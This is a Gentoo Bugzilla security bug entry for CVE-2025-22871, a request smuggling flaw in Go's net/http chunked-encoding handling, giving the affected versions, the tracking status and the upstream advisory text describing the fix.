953351 – (CVE-2025-22871) <dev-lang/go-{1.23.8,1.24.2}: net/http: request smuggling through invalid chunked data

Bug 953351 (CVE-2025-22871) - <dev-lang/go-{1.23.8,1.24.2}: net/http: request smuggling through invalid chunked data

Summary: <dev-lang/go-{1.23.8,1.24.2}: net/http: request smuggling through invalid chu...

Status:	CONFIRMED

Alias:	CVE-2025-22871

Product:	Gentoo Security
Classification:	Unclassified
Component:	Vulnerabilities (show other bugs)
Hardware:	All Linux

Importance:	Normal normal
Assignee:	Gentoo Security

URL:
Whiteboard:	A3 [glsa? cleanup]
Keywords:

Depends on:	953353 953354
Blocks:
	Show dependency tree

Reported:	2025-04-07 13:45 UTC by William Hubbs
Modified:	2025-04-18 12:34 UTC (History)
CC List:	0 users

See Also:
Package list:
Runtime testing required:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description William Hubbs gentoo-dev

2025-04-07 13:45:47 UTC

The net/http package accepted data in the chunked transfer encoding
containing an invalid chunk-size line terminated by a bare LF.
When used in conjunction with a server or proxy which incorrectly
interprets a bare LF in a chunk extension as part of the extension,
this could permit request smuggling.

The net/http package now rejects chunk-size lines containing a bare LF.

Thanks to Jeppe Bonde Weikop for reporting this issue.

This is CVE-2025-22871 and Go issue https://go.dev/issue/71988.